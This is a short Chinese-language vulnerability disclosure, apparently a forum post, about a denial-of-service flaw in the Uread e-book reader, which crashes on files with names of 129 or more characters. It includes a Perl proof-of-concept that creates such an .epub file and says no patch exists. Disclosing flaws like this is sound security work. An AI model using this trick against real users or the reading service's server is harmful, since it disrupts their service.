Uread阅读器拒绝服务漏洞的分析与解决
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。 <br />远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。 <br />测试证明 <br />----------------------------------------------------------- <br />#!/usr/bin/perl -w <br />$filename="a"x129; <br />print "------Generate testfile \"a\"x129.epub------\n"; <br />open(TESTFILE, ">$filename.epub"); <br />sleep(3); <br />close(TESTFILE); <br />print "------Complete!------\n"; <br />exit(1); <br />----------------------------------------------------------- <br />修复方案: <br />目前厂商还没有提供补丁或者升级程序。 <br />作者 demonalex <br />
頁:
[1]